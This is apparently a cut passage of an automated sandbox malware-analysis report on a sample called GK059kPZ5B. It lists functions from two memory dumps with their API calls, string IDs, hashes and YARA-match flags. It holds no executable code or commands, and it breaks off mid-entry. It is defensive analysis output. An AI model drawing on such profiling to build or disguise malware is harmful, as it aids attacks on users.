                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00A7E261
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                            • String ID: 11@
                                                            • API String ID: 1079102050-1785270423
                                                            • Opcode ID: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                            • Instruction ID: 50d8bc9eb9d13bfd05edf69c35058f216d6e1a4193ad392225b0d9f116fa294d
                                                            • Opcode Fuzzy Hash: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                            • Instruction Fuzzy Hash: 62113630640305ABFF04BB709E0BFAD3768AF08B04F10C5A8F9095B1D3EBB1994087A5
                                                            Function 00A7E204 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00A821E4), ref: 00A7E220
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00A821E4), ref: 00A7E25A
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00A7E261
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                            • String ID: 11@
                                                            • API String ID: 1079102050-1785270423
                                                            • Opcode ID: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                            • Instruction ID: bfd779b5cf063cfa1384ea1eab49eebd8c68766dfebfad12269788010967a880
                                                            • Opcode Fuzzy Hash: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                            • Instruction Fuzzy Hash: 9D112970640305ABFF04BB709E0BFAD3768AF19B04F1085A8F9095B1D3DBB1994087A5
                                                            Function 0040EF4B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: 11@$f(@
                                                            • API String ID: 1452528299-1277599000
                                                            • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                            • Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
                                                            • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                            • Instruction Fuzzy Hash: 24110236204117BFCF125F62DC4456BBB65FF08712B14443AF905AB290DA749820ABD5
                                                            Function 00425F1B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
                                                              • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
                                                              • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                            • String ID: 11@
                                                            • API String ID: 2684344702-1785270423
                                                            • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                            • Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
                                                            • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                            • Instruction Fuzzy Hash: CB01DB35700629ABCF01DF54D5808AE77B9EF89354B55006AEC06DB301DA34DE05DB60
                                                            Function 00A76182 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00A76194
                                                              • Part of subcall function 00A75161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A7517E
                                                              • Part of subcall function 00A75161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A75193
                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00A761C7
                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A761F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                            • String ID: 11@
                                                            • API String ID: 2684344702-1785270423
                                                            • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                            • Instruction ID: 727946ba7790535962bfd4e8f839559127495e658777e35570e94e63782eb880
                                                            • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                            • Instruction Fuzzy Hash: 9201BE75600519AFCF05DF54C9949AE77F9EF89350B548075EC06D7301DB70DE059790
                                                            Function 0040D4EB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
                                                              • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
                                                              • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
                                                            • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                            • String ID: 11@
                                                            • API String ID: 2524916244-1785270423
                                                            • Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                            • Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
                                                            • Opcode Fuzzy Hash: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                            • Instruction Fuzzy Hash: D201D6359042248BDF11AB50C450BFDB372AF84714F1440AADA116B3A5DBBCBE41C799
                                                            Function 00A5D752 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00A61DC9
                                                              • Part of subcall function 00A60CD8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00A60CEB
                                                              • Part of subcall function 00A60CD8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00A60CF5
                                                            • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00A61DE2
                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00A61E28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                            • String ID: 11@
                                                            • API String ID: 2524916244-1785270423
                                                            • Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                            • Instruction ID: 2d28d5878072f97747fbe35c8cca0aa75cd620375e2b95afc8193dfcc316512c
                                                            • Opcode Fuzzy Hash: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                            • Instruction Fuzzy Hash: 7401DE39A00220CBDF15EBA0CA54BBEBBB2FF84310F1D4045D8026B385CB79AE05CB91
                                                            Function 0041DA2B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                            • String ID: 11@$pContext
                                                            • API String ID: 1687795959-1086721755
                                                            • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                            • Instruction ID: 9010ffe1b6885ba769d18c3576365b3581292a7ba769087c8389302fb8d97d4f
                                                            • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                            • Instruction Fuzzy Hash: B5F0593AB006159BCB04EB59DC45C5EF7A8AF85B64710007BFD01E3342CFB8EE058698
                                                            Function 00A8016B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,00A8011C,00000000,?,00A800BC,00000000,00457970,0000000C,00A80213,00000000,00000002), ref: 00A8018B
                                                            • GetProcAddress.KERNEL32(00000000,004496C4), ref: 00A8019E
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A8011C,00000000,?,00A800BC,00000000,00457970,0000000C,00A80213,00000000,00000002), ref: 00A801C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: 11@
                                                            • API String ID: 4061214504-1785270423
                                                            • Opcode ID: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                            • Instruction ID: c319c65c5ed9698e27a4b3a1b1b77343cb68661b80a2d0dcda50c058e55372d0
                                                            • Opcode Fuzzy Hash: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                            • Instruction Fuzzy Hash: 91F06834600218FFDB11AF50DD49BAEBFB4EF05B12F110175F805A2150DB759E44DB54
                                                            Function 00A5C8A4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A5C903
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception@8Throw
                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                            • API String ID: 2005118841-1866435925
                                                            • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                            • Instruction ID: 110221db1317248ca7ac7afd5caa6c84fb6b703d2b44cb2c6363b8faa5cdf16a
                                                            • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                            • Instruction Fuzzy Hash: 5EF0B173D003086ECB14EA54CD42BEA77A47B05367F14C056ED566A087E77C9D0DC795
                                                            Function 00428DEC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                            • ExitThread.KERNEL32 ref: 0042DFFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                            • String ID: f(@
                                                            • API String ID: 3213686812-2560262586
                                                            • Opcode ID: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                            • Instruction ID: 69bc41ef776010156a50f9e736d675acab369240ea0dcafc6817c09100241395
                                                            • Opcode Fuzzy Hash: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                            • Instruction Fuzzy Hash: 1FF0E260B8432639FA2037A2BD0BBAA16150F24B0DF96042BBE0A991C3DE9C9551416D
                                                            Function 00A90911 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog3_catchmake_shared
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3472968176-2084237596
                                                            • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                            • Instruction ID: 3c58dbc467e7579ac58c57e4a59dc2af810355165cef31d5373baed2aef7ce1e
                                                            • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                            • Instruction Fuzzy Hash: DCF0FF71600514DFDF21AFA4CA02B6D7BB5AF05B40B4AC092F9445F322CB799E44CBA1
                                                            Function 0042DF9D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                            • ExitThread.KERNEL32 ref: 0042DFFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                            • String ID: f(@
                                                            • API String ID: 3213686812-2560262586
                                                            • Opcode ID: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                            • Instruction ID: 0285dfc7d7792d99b816c6e179ba3485ab9a4e2f62b66e3f0321d916b514c371
                                                            • Opcode Fuzzy Hash: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                            • Instruction Fuzzy Hash: EEF0557078432535FA203BA2BD0FB961A240F10B0EF56002BBF09991C3DEEC9690416D
                                                            Function 004242E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424319
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042432B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00424339
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                            • String ID: pScheduler
                                                            • API String ID: 1381464787-923244539
                                                            • Opcode ID: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                            • Instruction ID: dcb9093c936754fa26cda4c49a5e66a6ec85891f206a073b4e5aa53fece02954
                                                            • Opcode Fuzzy Hash: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                            • Instruction Fuzzy Hash: 23F0A731B0122467C718FB55E842D9E77B99E403087D0816FB802A3182CF7CA949C69D
                                                            Function 00A6E8A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00A6E8C6
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A6E8D9
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A6E8E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                            • String ID: 11@
                                                            • API String ID: 1990795212-1785270423
                                                            • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                            • Instruction ID: 4161c85827e7815b08417fab0771bee0374036caf8b8ecdc6b9487e3ab47d4c7
                                                            • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                            • Instruction Fuzzy Hash: 89E06839B0010867CB00FB68DC0AC5DB7F9AEC0B11314802AFD15A3342DFB4AA08C6C4
                                                            Function 0042E05D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E073
                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E082
                                                            • _free.LIBCMT ref: 0042E089
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CloseFreeHandleLibrary_free
                                                            • String ID: -B
                                                            • API String ID: 621396759-1993606306
                                                            • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                            • Instruction ID: 17050b68875c52b9acd6c54ac6ffc846a702ed9b00f998fe1c0864977ee07d81
                                                            • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                            • Instruction Fuzzy Hash: E9E08632101A34AFD7315F57F808B57BBD4EF15722F54C52AE41911560C7B9AD82CB9C
                                                            Function 00415DAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DDA
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DE8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                            • String ID: pScheduler$version
                                                            • API String ID: 1687795959-3154422776
                                                            • Opcode ID: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                            • Instruction ID: 654ef00f808b34ad7b75b8e59998346ebad61dbc4125ce9a21f33dce7aa536fc
                                                            • Opcode Fuzzy Hash: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                            • Instruction Fuzzy Hash: 5CE04F30900608F6CB14AA55D80ABDD77A45B11749F60C02B7855610D29ABCA6D8CB4A
                                                            Function 004358B8 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                            • Instruction ID: f9eb826db87fdf2ea4d980863b0040f81c60248b0af39ab0b887e88b27670142
                                                            • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                            • Instruction Fuzzy Hash: BEA14871A00B869FEB11DE18C8917AEFBE5EF19310F18426FE5859B381C27C9D41C799
                                                            Function 00A85B1F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                            • Instruction ID: b37921a8380cf9cd12212e60b60a99fa8fa1f451312033c354b65497b7cb6d4f
                                                            • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                            • Instruction Fuzzy Hash: DBA13672E00B869FDB15EF78C8817AEBBE1EF62310F18416DED859B281D6389D41CB50
                                                            Function 0043FA28 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                            • Instruction ID: 944ec9a8cfd15a85abea22ed7e483bbecdcf94b25d0ac16da2a86ed09b95ce29
                                                            • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                            • Instruction Fuzzy Hash: E8414771E00210AADB247BBBDC52ABF76A8EF4D334F14127BF418C6291D67C9D49826D
                                                            Function 00A8FC8F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
                                                            • Instruction ID: d763d6caa8603fa3f96a4de60ee1732a4025e78b784ef9a98eb0d1d7987850b7
                                                            • Opcode Fuzzy Hash: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
                                                            • Instruction Fuzzy Hash: 6B417B31A001026FDF34BFB88D46AAE7BA4EF09774F248675FA1CD62A2F734484047A1
                                                            Function 00A86B24 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,00A8049A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 00A86B71
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A86BFA
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A86C0C
                                                            • __freea.LIBCMT ref: 00A86C15
                                                              • Part of subcall function 00A8392E: RtlAllocateHeap.NTDLL(00000000,00A5DAFC,00000000), ref: 00A83960
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 3871a130c6b9b3006aa1f46d6ff278bf932d4d7330f30c68a16d81a1f714d6d8
                                                            • Instruction ID: ee1b11f7a741a3ed8b0e15d93353e43c7e697881482c5f0d37d3962aff10d9fa
                                                            • Opcode Fuzzy Hash: 3871a130c6b9b3006aa1f46d6ff278bf932d4d7330f30c68a16d81a1f714d6d8
                                                            • Instruction Fuzzy Hash: 4331AE72A0021AAFEF25AF64DC85EAE7BB5EB40714F144268FC59DB150E735CD90CBA0
                                                            Function 00401FB6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(00000005), ref: 00401FCB
                                                            • UpdateWindow.USER32 ref: 00401FD3
                                                            • ShowWindow.USER32(00000000), ref: 00401FE7
                                                            • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040204A
                                                            Memory Dump Source
